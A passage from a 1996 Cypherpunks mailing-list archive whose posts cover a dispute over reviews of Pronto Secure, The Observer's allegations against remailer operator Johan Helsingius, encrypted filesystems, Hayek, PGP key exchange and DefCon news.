donation to Burger King, or $1.49 with no donation.

Query:  How much is a Scoobie Doo Mystery Machine Van worth?

Query 2:  How much has Burger King "lost" if you donate a cent and take
the van?

Replace "one cent donation to Burger King" with "opportunity cost of
reviewing and writing a review of the software."

Replace "Scoobie Doo Mystery Machine Van" with "copy of crypto product."

Determine the cost of producing one software package.
Subtract the opportunity cost of the reviewer from software package.
production cost (or market cost if you prefer).

Now, revist your statement above.

> in case you're not as good in accounting as you think you are in 
> crypto.

Uh, perhaps you better direct your keen and unblurred accounting acumen
inward.

> I have no idea what your rep. is ... but I know one thing, they're 
> offering an exchange of valuable software (market value: $99) for valuable 
> services (crypto-rebel review)

The relevance of "market value" in the above paragraph is left as an
exercise for the reader, as is the nature of the term "valuable software."
 
> > Uh, the kiss ass paragraphs were the reviewers comments, not your code.
> 
> I aggreed with the reviewers comments, they're mine too ... I've sent many 
> long E-mails to people I do computer service for endorsing Pronto Secure.

Ok, and how much did it cost you in opportunity cost to write a few kiss
ass paragraphs about the software?  (Hint, it's almost certainly less than
$99, and if not, the crypto company is taking you for a ride).
  
> I have lined up 6 people who wish to purchase it.

And thousands in this country have bought pet rocks.  So?

> This is for real pal.  

Thankfully, I am not your pal.

I don't care if it is real or if it is not.  The point is that certain
marketing and review tactics make a crypto product, regardless of its
merit, look like a pile of dung.  Offering free copies to write reviews
where that offer contains phrases like "a $99 value) is one such tactic.

> If you don't like it, get out of the ring.

A little dissention upsetting for you?  If you don't like it, get off the
list.

> Some of us want our PGP to be nice and easy like E-mail used to be.

I'm not sure why my comments are so clearly, to you, a value judgement
about Pronto Secure itself.  My comments were directed toward their
marketing efforts and tactics.  I have since come to believe that the
marketing department there has got it on the money now, and understands
the way those kind of offers go over with some individuals on the list.  I
suggest you consider reviewing my original message.  Looks to me like you
just replied to a reply to a reply.

> Message Copyright 1996, Michael T. Babcock
> http://www.cyberbeach.net/~mbabcock

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 28 Aug 1996 13:13:46 +0800
To: "Michael T. Babcock" <mbabcock@tyenet.com>
Subject: Re: $10K offer if you can break the code
In-Reply-To: <199608272124.OAA02407@toad.com>
Message-ID: <Pine.SUN.3.94.960827222149.5361C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 27 Aug 1996, Michael T. Babcock wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To: mpd@netcom.com, cypherpunks@toad.com
> Date: Tue Aug 27 17:17:57 1996
> Date: 23 Aug 96 13:59:38 EDT
>  From: "JOHN E. HOLT" <76473.1732@CompuServe.COM>
> Subject: secret message
> To: <mbabcock@tyenet.com>
> 
> Date:  01-Aug-96 14:50 EDT
>  From:  JOHN E. HOLT [76473,1732]
> Subj:  puzzle
> 
>         ^%}{{
> ZZ
> VVPAGMIGJEKMCCHIAKKPEHJDDDLOABGAMMJOCDFNOLNOKKKNIADPBGPPOEPIDCEMPGWW
> VVFCMOPKLKPJOHCNCJBDGOOJKFANCJJBDBMDIFIEKEDPLKDDGMPLHMIIPIJFMKOLENWW

[blah blah]

Ok, just a second here.  What are the terms of the contest?

Why am I convinced I know the answer already?

> Message Copyright 1996, Michael T. Babcock
> http://www.cyberbeach.net/~mbabcock
> 
> Send a message with the subject "Send public key" to
> receive an automatic reply with my public key.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3i
> Charset: ascii
> Comment: http://www.cyberbeach.net/~mbabcock/PGP/
> 
> iQC1AgUBMiNmCttTCwP6TF2xAQG65AT9GW2JbpaAo26USWptnLhhdaHWXbvDEi2i
> 35KWFHPWnlfJmj7NiUz+YKAV1aoHJssbGGUKIGoU1R0AV9NepGcODRwamrpZMXZ2
> 2TWIjgc0NbI+G9PNJrtc9h0XhsWV+w9upF0Yr1uCdCMtsdQtMKGguPzfd3+CfOkq
> X5kSv4WIhi22WYwHHlyEyEMPrxMo60ey1EFUUctBYLqgl91omsR+qg==
> =wEv6
> -----END PGP SIGNATURE-----
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 28 Aug 1996 13:15:06 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 20 August 1996
Message-ID: <01I8SBQ60IWW9JDBTS@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From:	IN%"educom@educom.unc.edu" 21-AUG-1996 02:46:51.91
>To:	IN%"edupage@elanor.oit.unc.edu"  "EDUCOM Edupage Mailing List"
>CC:	
>Subj:	Edupage, 20 August 1996

[...]

>*****************************************************************
>Edupage, 20 August 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

[...]

	I am willing to bet that the new domain name organization(s) will also
have to implement a policy similar to the below, although some may be more
lax on one side or the other. (It occurs to me that ibm.org should not be
confusable with ibm.com by any "reasonable person" - or at least any reasonable
person with any business making assumptions by what they see on the Net.)

>NETWORK SOLUTIONS SEEKS DOMAIN DISPUTE SOLUTIONS
>Network Solutions Inc., which August 9 announced another round of revisions
>to its Domain Name Dispute Policy, is imposing additional requirements on
>the trademark holder who challenges a domain name registrant with trademark
>violation.  The trademark registration must be identical to the domain name,
>and trademark holders must provide NSI a certified copy of its trademark
>registration, as well as a copy of a written notification addressed to the
>domain registrant of the trademark holder's prior claim.  In an attempt to
>avoid being named in any more lawsuits, the new NSI policy implements an
>interpleader-like procedure, where NSI turns over control of any disputed
>domain name to the court and will carry out all court orders without being
>named a party to the suit.  The new guidelines go into effect Sept. 9, and
>text of the revised policy can be found at < http://rs.internic.net >.  (BNA
>Daily Report for Executives 19 Aug 96 A7)

	Hopefully, the below is a bit too pessimistic... it appears quite
possible to institute more just charges (as per how much the person is
burdening the Net) without a crash. (Did AOL's size have anything to do with
the length of the shutdown, as opposed to its effects?)

>GROWING PAINS ON THE NET
>The inadvertent shutdown of America Online a few weeks ago was only the
>beginning, say some industry observers, who predict that outages at
>overburdened Internet providers will become more common in the future.
>"Maybe for the first time in the history of the Internet, the demand is
>exceeding the supply that technology can deliver," says the CEO of Advanced
>Network & Services.  Because flat-rate pricing is the dominant Internet
>service provider business model, there is no financial incentive to conserve
>the resource, warns the executive VP of Nynex Science & Technology.  He
>predicts that the Internet eventually will collapse under its own weight,
>but will reemerge with "a lot more tollbooths on that highway than there are
>now."  (Business Week 26 Aug 96 p62)

[...]

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.

>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill.

>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>George Gershwin (if your name is George Gershwin;  otherwise, substitute
>your own name).  ...  To cancel, send a message to: listproc@educom.unc.edu
>with the message: unsubscribe edupage.   (If you have subscription
>problems, send mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 28 Aug 1996 16:08:35 +0800
To: cypherpunks@toad.com
Subject: Re: Hayek (was: Cato Institute conference on Net-regulation)
Message-ID: <ae492e2b01021004ff49@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:26 AM 8/28/96, Dr.Dimitri Vulis KOTM wrote:
>Senile tcmay@got.net (Timothy C. May) rants:
>> Indeed, Hayek has had a _lot_ to do with the Cypherpunks! From "The Road to
>> Serfdom" to "Law, Legislation, and Liberty," his works have exerted a
>> profound influence on me, and on many others.
>
>But he's fucking unreadable.  I plan to teach economic this semester and
>make every student read Hazlitt (economics in 1 lesson). I can't force them
>to read hayek (or Rothbard) because they're fucking unreadable. Shit.

Well, to one who inserts "(spit)" after nearly every name he cites, and
critiques Hayek as "fucking unreadable. Shit.," I suppose Hayek must indeed
seem unreadable. Shit.

After all, Hayek rarely writes things like: "The senile Von Mises (spit)
and his Sovok Cabal plotters...."

As to "forcing" your students to read Hayek, just who is in charge? If
you're the instructor, they can choose to read what you tell them to read,
or be unprepared on the exams you give and possibly flunk the class. What
part of "Required Reading" do you or your students not understand?

--Tim (spit) May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Fidell <james@corp.netcom.net.uk>
Date: Wed, 28 Aug 1996 08:57:18 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: Re: "The Observer" calls the internet a child pornography ring
In-Reply-To: <199608272004.NAA15842@dns2.noc.best.net>
Message-ID: <199608272209.XAA22191@corp.netcom.net.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Banner Front page headline in the British Observer, Sunday 25th
> 
> "The Peddlers of child abuse"
> see http://scallywag.com/
> 
> The internet is presented as a conspiracy by child molesters.
> 
> There is a picture of Johan Helsingius, the man who free of charge
> provides an anonymous remailer service:  The picture is captioned "The
> internet middle man who handles 90% of all child pornography"  He is
> represented as personally profiting from the distribution of child
> pornography, though in fact no posts to binary newsgroups can go
> through his system, and no large binaries can go through his system,
> and he provides the anonymising service free of charge.
>
> There is a picture of Clive Feather, the man who runs the largest
> internet service provider in Britain, captioned "The school governor
> who sells access to photos of child rape"]]

I'm not sure even Clive would claim that he "runs the largest ISP in
Britain" :-)

> The observer article savagely demonizes all who use the internet,
> presenting it as primarily existing for the purpose of distributing
> child pornography, and demonizes and libels by name those who have
> sought to defend the liberty of netizens.
> 
> I urge you all to check out this article, and send snail mail letters
> to the observer condemning (since they are obviously too low tech to
> read email) and email letters of support to those netizens who have
> been savagely libeled for their defence of liberty.

They do have a WWW site -- http://www.guardian.co.uk/observer/
The only feedback address I could find is nml@guardian.co.uk

James.
-- 
 "Yield to temptation --             | Work: james@corp.netcom.net.uk
  it may not pass your way again"    | Play: james@hermione.demon.co.uk
                                     | http://www.netcom.net.uk/~james/
        - Lazarus Long               |              James Fidell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 28 Aug 1996 14:15:47 +0800
To: cypherpunks@toad.com
Subject: (flatulence): Reply-to loops
In-Reply-To: <199608280257.TAA25752@scn.org>
Message-ID: <v0300781cae49348e071b@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:57 AM -0000 8/28/96, SCN User wrote:
> BTW: When is this list/listserver going to convert the reply-to fields to 
>      point to cypherpunks@toad.com?

Never.

We don't do it because of reply-to loops.

Only idiots, or charitably, those with very low traffic, run their mail lists any other way.

Accidentally sending private e-mail to the list is bad enough without bringing the listserver to its knees...

Cheers,
Bob Hettinga
([probationary] former idiot)

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 28 Aug 1996 17:06:07 +0800
To: cypherpunks@toad.com
Subject: Re: FYI: GOP's Stolen Laptop...
Message-ID: <199608280700.AAA11957@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:41 PM 8/27/96 -0500, Andrew Loewenstern
<andrew_loewenstern@il.us.swissbank.com> wrote:
>> They should have used PGP on those files.....
>
>...but I thought fine, upstanding, and law-abiding citizens didn't have  
>anything to hide...

These are _Republicans_, Andrew!    :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 28 Aug 1996 14:49:37 +0800
To: remailer-operators@c2.org
Subject: Nando.Net on Observer, Julf
Message-ID: <01I8SF5X601C9JDBTS@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Good luck. Overall a positive article, although I've noted one definite 
goof. I wonder if it would be possible to sue this FBI idiot as well as The
Observer?
	-Allen

>   Avis
>                    FINN REJECTS INTERNET CHILD PORN CLAIMS
   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   HELSINKI (Aug 26, 1996 10:53 a.m. EDT) - On the eve of a major
>   conference on child sex abuse, a Finnish Internet specialist on Monday
>   angrily dismissed allegations in a British newspaper that his system
>   handled up to 90 percent of child pornography on the Net.
   
[...]
   
>   The newspaper reported the charges, by a U.S. policeman and FBI
>   adviser, in the run-up to an international conference in Stockholm on
>   the commercial sexual exploitation of children starting on Tuesday.
   
>   Finnish police also said they had found no evidence in areas they can
>   investigate that Helsingius's system is now being used to forward
>   child pornography on a large scale.
   
>   "We are working very closely with the authorities and the child
>   protection agencies -- I am always encouraging people to report any
>   incidence of child pornography they see on the Internet to police, so
>   that they can investigate and act," Helsingius told Reuters by
>   telephone.
   
>   The Observer quoted Toby Tyler, a Federal Bureau of Investigation
>   adviser on child abuse and pornography, as saying 75-90 percent of the
>   child pornography he saw on the Internet was forwarded through
>   Helsingius' system.
   
>   Internet remailers are computers which receive and forward messages
>   with a pseudonym or anonymous source.
   
>   There are about five in the world, and they exist to enable anonymous
>   discussion of sensitive subjects -- for instance by victims of child
>   abuse, potential suicides or people in politically repressed
>   societies.

	Five? Someone's miscounted...
   
>   Helsingius said one key reason his system would not be used for
>   pornorgaphy was that it has built-in capacity limitations which make
>   it impossible to send large pictures through it -- only small amounts
>   of text.
   
>   "Also the groups where pictures are carried...are not supported in my
>   server," he said.
   
>   It could be possible to compress and chop up picture material for use
>   through the server but this would involve using "tens or hundreds of
>   separate messages," he said.
   
>   Kai Malmberg, a Helsinki police specialist in Internet affairs, said
>   he had in the past found child pornography remailed through the server
>   but it had stopped since police started investigating.
   
>   "I've found really no evidence of the Finnish remailer being used for
>   child pornography," he said. "But we can't -- we don't want to --
>   check people's mail. That would be like going into the post office and
>   opening all the letters.
   
>   "I believe that he's quite sincere in trying to protect his server for
>   people to discuss sensitive issues," he said.
   
>   Asked if his system could be used to carry child pornography through
>   individual e-mail messages, Helsingius said this was possible but not
>   on a large scale as it does not support e-mail systems which
>   simultaneously send to many recipients.
   
>   But he said it was possible for Internet experts to imitate his
>   remailer address to make it seem as if messages were coming through
>   his system.
   
>   "In a prevous case roughly a year ago we could find a couple of cases
>   of child porn," he said. "It was actually posted in the UK to the UK
>   -- it didn't come to Finland at all but it was being made to look like
>   it came from my server. Anyone can alter the origination information."
   
>   He said all the allegations about his remailer seemed to stem from
>   Tyler, yet he had been unable to contact him. Tyler was travelling to
>   the Stockholm conference on Monday and unavailable for comment.
   
>   "The fact that he's claiming 90 percent of the child porn goes through
>   my remailer is pretty far from the truth. There might be the
>   occasional instance and we are actively working against that,"
>   Helsingius said.
   
>   "My reputation has been tarnished all over Europe. We will take legal
>   action, but we are not quite sure in what country."
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 28 Aug 1996 15:06:24 +0800
To: cypherpunks@toad.com
Subject: Re: Hayek (was: Cato Institute conference on Net-regulation)
In-Reply-To: <ae48e75e01021004001f@[205.199.118.202]>
Message-ID: <4TscTD14w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Senile tcmay@got.net (Timothy C. May) rants:
> Indeed, Hayek has had a _lot_ to do with the Cypherpunks! From "The Road to
> Serfdom" to "Law, Legislation, and Liberty," his works have exerted a
> profound influence on me, and on many others.

But he's fucking unreadable.  I plan to teach economic this semester and
make every student read Hazlitt (economics in 1 lesson). I can't force them
to read hayek (or Rothbard) because they're fucking unreadable. Shit.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Wed, 28 Aug 1996 16:33:37 +0800
To: drifter@c2.net (The Drifter)
Subject: Re: File System Encryption
In-Reply-To: <Pine.SUN.3.94.960827181039.23478A-100000@infinity.c2.net>
Message-ID: <199608280536.AAA01510@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> 
> On Tue, 27 Aug 1996, Douglas R. Floyd wrote:
> 
> > If you have another 386 or 486 lying around, you could install Linux and
> > Ian's encrypted loopback code on a remote box, then NFS or Samba the
> > filesystem over.  For protection, you could modify the vlock command to
> > lock the console (and not unlock it), and disable inetd.  Then, unless
> > someone has the permissions to access the files through the network, the
> > files are inaccessable ;-).
> 
> I may have to consider this approach. I'll have to look into Ian's system.
> Does it pass muster with the crypto gods? (that's meant as a compliment
> guys :)

It uses IDEA in a decently secure manner, as well as TDES.  You can also
mount .au files as filesystems, and the data will be hidden in the sound
file.

(Last place I remember Ian's loop.c and des patches for Linux was on
ftp.csua.berkeley.edu, /pub/cypherpunks/<somewhere>)

> 
> Drifter
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiechman@iconnet.com
Date: Wed, 28 Aug 1996 15:07:37 +0800
To: cypherpunks@toad.com
Subject: WORD Mail: A Part of Our Lives...
Message-ID: <9608280446.AA00120@word.iconnet.net>
MIME-Version: 1.0
Content-Type: text/plain


 
     
      Dear Friends of Word [http://www.word.com]:
            
      Two things:
      
      1.  Word has been nominated for 3 (three) of the 1996 Cool Site of the 
      Year Awards (Cool Site of the Year, Cool Design of the Year, and Cool 
      Web Designer of the Year).  Please vote for us.  We're literally 
      begging you.  Does this seem desperate?  Cool Site of the Year is 
      located at http://cool.infi.net/vote.html
      
      2.  Please check out Word [http://www.word.com].  Right now you can 
      experience our special feature "Guyana," a super-deluxe documentary 
      about three NYC artists' (Bob Braine, Mark Dion, and Alexis Rockman) 
      six-week trek through the Amazon jungle.  It's got art, animation, 
      text, and an original score. Sort of like a movie. But not. Anyway, 
      it's real good. Mmmmm!
      
            Truly Yours,
            WORD
      
      
      
      3.  I know we said there would only be two things, but we just thought 
      we should mention that if you've requested to be removed from our 
      mailing list, it *will* happen very soon.  We've had a bit of trouble 
      keeping everything up to date.  Word swears to remove you from the 
      list.
      
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael T. Babcock" <mbabcock@tyenet.com>
Date: Wed, 28 Aug 1996 15:08:43 +0800
To: cypherpunks@toad.com
Subject: Key Exchange Request
Message-ID: <199608280446.AAA01992@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Type Bits/KeyID    Date       User ID
pub  1280/FA4C5DB1 1996/06/13 Michael T. Babcock <mbabcock@tyenet.com>
                              Michael T. Babcock <mbabcock@cyberbeach.net>

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
Comment: http://www.cyberbeach.net/~mbabcock/PGP/

mQCtAzHAhC8AAAEFAMG+C+yN8q7KDT5TUSdyQNZlDDlTGuF4vUzPEq52lrqx7NAA
YwJuj0dtOnnU2GAAonNutYF7nbbsS5yjWWgENioKOzIdjgDpq+YBZDkX4kFTD/+5
PM5EZhS1kT54zDpbjlZHtu9ViL3xUD/vp5zmp7Mlxqdd5SbkM0bpIBlBIqfpij59
hOVgc837YtAMmAbuRzwzy06/5ne221MLA/pMXbEABRG0KE1pY2hhZWwgVC4gQmFi
Y29jayA8bWJhYmNvY2tAdHllbmV0LmNvbT6JALUCBRAyG4B8iNNjBTZRc5UBAQgN
BQCUEtqBZp6AHxuzl8ul5YdrgSmVzL5KZ+h5ZSsahq3Z880Z2+iL2nHlQxE/Kx+A
+sBALnqjcZ1jFVd//kdUW3Z6MR805txMXhxSm8350uxv9SVgR9fFatuBphyMY3+H
JCJABOD8W/78l+ryKzrDIkTRcZZ/ZfAIFx8CuQbHAHREbd5WxUvwYD1RmYN0roEm
lX08htgUVpM5KrsdO1QFZXJciQCVAwUQMdnXD03i+M8vT7SzAQGdPgP/U/LYSAdj
Fv9F9B+B0zzUOUyZVzP+esMRLVja69FXpLvpSbzHZuibwgx6iHzQvJU7FgoNR6Le
xMjVobVz6dvQNn4Cyv/IVSYhQ7OeQpVpPROMd7oNpi2REond6iTulNwJ582yNWbg
HpXF+rcyQGLSZW1M97dstKVJaA1M+1I+KBiJAJUDBRAxwISNpWTgrlDImaUBAXK9
BACT9ZVN4CQonU8MhzZXNepMm2k3xAkM/01e1vjqjnHR95g9xysVJCeSh0aky+Jk
v7Yok5hRLhZ8CWmt+n/vAEZI6thIJlF++CLX6XHaZVN0sXtOKJuzsu1za4Kllqbf
nRKkEKjixFQk37sDUHJPehiy7tYWVF364A5KQU9K7JenDIkAtQMFEDHAhDDbUwsD
+kxdsQEBo9wE/1TDLucmWU8nIQ3izH8bDLHv8UNfyKItlMwKQXcokOxFV1lhxtKu
RhsBjIiLD3iBXG7xd/Q8EgV9gbAXJ0IfdMBEXUbAqNgZBu0sPT5OWtdxQ4l7/uXl
A0bHNGe8/O+L76bq81dWn7i/iyggIDpcSYYp4pCqm0fPQFS8eMUc5fwQMhODgVH2
WTSKbIZrSXYUjv9Nu1hAHeo1xB7tyJCJePi0LE1pY2hhZWwgVC4gQmFiY29jayA8
bWJhYmNvY2tAY3liZXJiZWFjaC5uZXQ+iQCVAwUQMcCKaqVk4K5QyJmlAQF56gP9
F/kU8pMxVJdCDFVXyXm9STzEwZauLzMAHbIqWE7RzzDX1jX6e4bFDkpOP79SM19K
RMrB70IQ/0OerNDGA3foMTFde79CZwSN+sE4CBIziEzClCkoZR8lsURgrNCpgrfD
SfefCMERK2wsPRCHTm1/SQoc107xgPdZKV2MTsKa+l6JALUDBRAxwIo/21MLA/pM
XbEBAbXOBPsFGBbIKo04YVMaQRQXUXNJNaFys21ZforSlLXX6jh9XVnPfTzJHbba
lYtzBNMSzTn1S2INJUTsmakfMWSi3yghi6BVlBPJDhaC/lbmUPzbs1UtGwKzTJPP
oIW0ogvNiBUnEJBXLyEpLg4DDsmg74jT23m9kDIY5IT9tDQy2l+bVlDUl341DCSw
qd98jWjPf38BgLOldtanlYiYfSBcVIdO
=N34I
- -----END PGP PUBLIC KEY BLOCK-----


	This message was sent by Pronto Secure Mail.
	Above is my public key.
	Please send your public key by return mail.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMiPPNCoZzwIn1bdtAQHwiAGA25takabrZ8cinCavjJ4DMhYclePThtCz
2Wy+KH/pT42RVsMDtPvmwKeF8MEffw1N
=QuAh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 28 Aug 1996 11:30:25 +0800
To: cypherpunks@toad.com
Subject: DEF_con
Message-ID: <199608280059.AAA26208@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-26-96. EeTi: 
 
   "Unix gives hackers a crack at systems." 
 
      Las Vegas: Many of the hacking elite were on the 
      Internet long before the World Wide Web was a gleam in 
      the eye of inventor Tim Berners Lee. And these folks 
      know the best-kept secret of gaining access to-and 
      control of-someone else's electronic property: Unix. 
 
      An expert underground Web cracker who goes by the 
      handle +ORC noted with apparent glee: "With each 
      company that connects to the Net, new frontiers are 
      created for crackers to explore." 
 
      Indeed, even as many old-line hackers of the sort who 
      gathered here recently for the DefCon convention go 
      legit, some starting cyber-security companies of their 
      own, Internet-security experts look with trepidation 
      to the next, more threatening wave of cybercrime. 
 
      Perhaps the legendary hacker group l0pht is the best 
      example of the thin line between cybercriminal and 
      corporate comer. Several members spoke at DefCon, 
      notably Death Vegetable, administrator of the Cult of 
      the Dead Cow; and Mudge, the brilliant encryption 
      cracker who devised the S/Key Cracker's Toolkit and 
      posted it on the Net, much to the chagrin of Bellcore, 
      S/Key's owners. 
 
   ----- 
 
   http://jya.com/defcon.txt  (9 kb) 
 
   DEF_con 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 28 Aug 1996 11:43:16 +0800
To: cypherpunks@toad.com
Subject: SUN_pak
Message-ID: <199608280101.BAA26550@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   08-26-96. MiPa: 
 
   System for signatureless transmission and reception of 
   data packets between computer networks (Assignee -- Sun 
   Microsystems, Inc.) 
 
   Abstract: A system for automatically encrypting and 
   decrypting data packet sent from a source host to a 
   destination host across a public internetwork. 
 
   Inventors: Aziz; Mulligan; Patterson; Scott. 
 
   ----- 
 
   http://jya.com/sunpak.txt  (6 kb) 
 
   SUN_pak 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Wed, 28 Aug 1996 16:02:57 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Denning interview in Wired
In-Reply-To: <199608271723.KAA23960@netcom23.netcom.com>
Message-ID: <Pine.SOL.3.91.960828012847.800B-100000@echonyc.com>
MIME-Version: 1.0
Content-Type: text/plain


Didn't mean to be defensive or criticize you, Vladimir.  Just wanted to 
make it clear that the story didn't necessarily include all her 
reasonings. You make some fine points. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 28 Aug 1996 16:27:54 +0800
To: Blanc Weber <blancw@microsoft.com>
Subject: RE: Discussion: The Digital Commerce Clause [Long] [Was: Re: The Commerce Clause and the Crypto Issue]
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-960828022819Z-22262@mail.microsoft.com>
Message-ID: <Pine.SUN.3.94.960828020522.18743A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 27 Aug 1996, Blanc Weber wrote:

> >From:	Black Unicorn 
> >
> >I believe the answer to preserving the purity of digital commerce is to
> >form it in such a way so as to make regulation impossible, because in my
> >view the constitution no longer provides citizens with the protection or
> >freedom to progress.  I feel the same way about privacy.  All the
> >constitutional arguments in the world mean little today.  A systematic
> >approach which makes violations of personal rights impossible whether
> >constitutional or not is the answer.
> >.....................................................

[...]

> >I agree very much with what you say in the above paragraph about the
> >constitutional arguments [by jove, I think he's got it :>)]   So many times
> >people (especially libertarian types) will present their protests in
> >reference to constitutional issues.  Yet there are some contradictions within
> >the Constitution, or areas which sound that way, and which are therefore too
> >easily misconstrued by present thinkers (judges, lawyers, etc.).
> >
> >So often the document is referred to like a magic mantra which is going to
> >take away the ills and boogeymen by waving it in front of their faces.  But
> >the document is not so well read, understood, nor respected by those in
> >public office.  It isn't used as a guide to move towards more self-reliance
> >rather than less.  I have heard from one political potentiate that his
> >opponent (already in office) had not ever even read it.
> >
> >You can't depend upon adherence to the Constitution to create the reality
> >you're after (although, like a dart-shoot, you can always try and it does,
> >after all, supply the basics for the established legal procedures and it's
> >possible to set the fear of it upon government types by setting their feet to
> >its fire -  if you can pay for it).

With all the talk of self-enforcing contracts via cryptography, it is a
bit surprising to me that no one has suggested a constitution (which is
basically a unilateral contract) be enforced in such a matter, or in an
indirect way through technology.

I do find it sad that it seems that rights today must be enforced despite,
and not by, trust.

Perhaps soon there will exist institutions which make rights inalienable
in fact, not in theory.

> >Blanc

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 28 Aug 1996 16:33:06 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
Message-ID: <9608280621.AA29030@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 27 Aug 96 at 21:16, jim bell wrote:

> See the difference?  An open system holds legislators to a much
> higher standard, which is why they don't like it and is why we
> should insist on it.

Fine Jim, but how?  Any idea of a system that could lead to that?

JFA
who's ROTFL!

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wayne Clerke <wclerke@emirates.net.ae>
Date: Wed, 28 Aug 1996 09:47:45 +0800
To: "'drifter@c2.emirates.net.ae>
Subject: RE: File System Encryption
Message-ID: <01BB948C.BD6EAD20@csb085.emirates.net.ae>
MIME-Version: 1.0
Content-Type: text/plain


----------
From: 	Drifter[SMTP:drifter@c2.net]
Sent: 	Monday, 26 August 1996 16:19
To: 	cypherpunks@toad.com
